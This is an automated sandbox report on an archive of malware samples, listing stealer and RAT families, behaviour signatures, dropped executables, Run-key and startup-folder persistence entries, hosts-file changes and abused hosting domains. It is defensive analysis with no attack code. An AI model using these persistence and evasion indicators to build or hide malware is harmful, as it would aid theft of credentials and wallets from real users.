Malware Analysis Report

2025-01-23 11:57

Sample ID 241214-yzc98svkfr
Target 241127-xqsswsslej_pw_infected.zip
SHA256 cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Tags
amadey asyncrat lumma merlin quasar redline xworm backdoor collection credential_access defense_evasion discovery execution infostealer persistence privilege_escalation pyinstaller ransomware rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

Threat Level: Known bad

The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

amadey asyncrat lumma merlin quasar redline xworm backdoor collection credential_access defense_evasion discovery execution infostealer persistence privilege_escalation pyinstaller ransomware rat spyware stealer trojan upx

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

Redline family

Quasar RAT

RedLine payload

Lumma family

Quasar payload

Xworm family

Amadey

RedLine

Asyncrat family

Merlin

Quasar family

Lumma Stealer, LummaC

AsyncRat

Amadey family

Merlin payload

Detect Xworm Payload

Merlin family

Async RAT payload

Downloads MZ/PE file

Blocklisted process makes network request

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Loads dropped DLL

Clipboard Data

Unsecured Credentials: Credentials In Files

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Enumerates connected drives

Looks up external IP address via web service

Checks installed software on the system

Drops file in System32 directory

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

UPX packed file

Drops file in Windows directory

Drops file in Program Files directory

Detects Pyinstaller

Embeds OpenSSL

Event Triggered Execution: Netsh Helper DLL

Command and Scripting Interpreter: JavaScript

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

Browser Information Discovery

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

System policy modification

Modifies registry key

Gathers system information

Detects videocard installed

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies Control Panel

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Modifies registry class

Suspicious use of WriteProcessMemory

Kills process with taskkill

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Views/modifies file attributes

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-14 20:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-14 20:13

Reported

2024-12-14 20:22

Platform

win11-20241007-es

Max time kernel

264s

Max time network

554s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Merlin

backdoor merlin

Merlin family

merlin

Merlin payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4020 created 3260 N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com C:\Windows\Explorer.EXE
PID 4020 created 3260 N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
N/A N/A C:\Windows\sysnldcvmr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3076928777.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\shost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\shost.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\new = "C:\\Users\\Admin\\AppData\\Roaming\\new.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" C:\Windows\system32\audiodg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A bitbucket.org N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
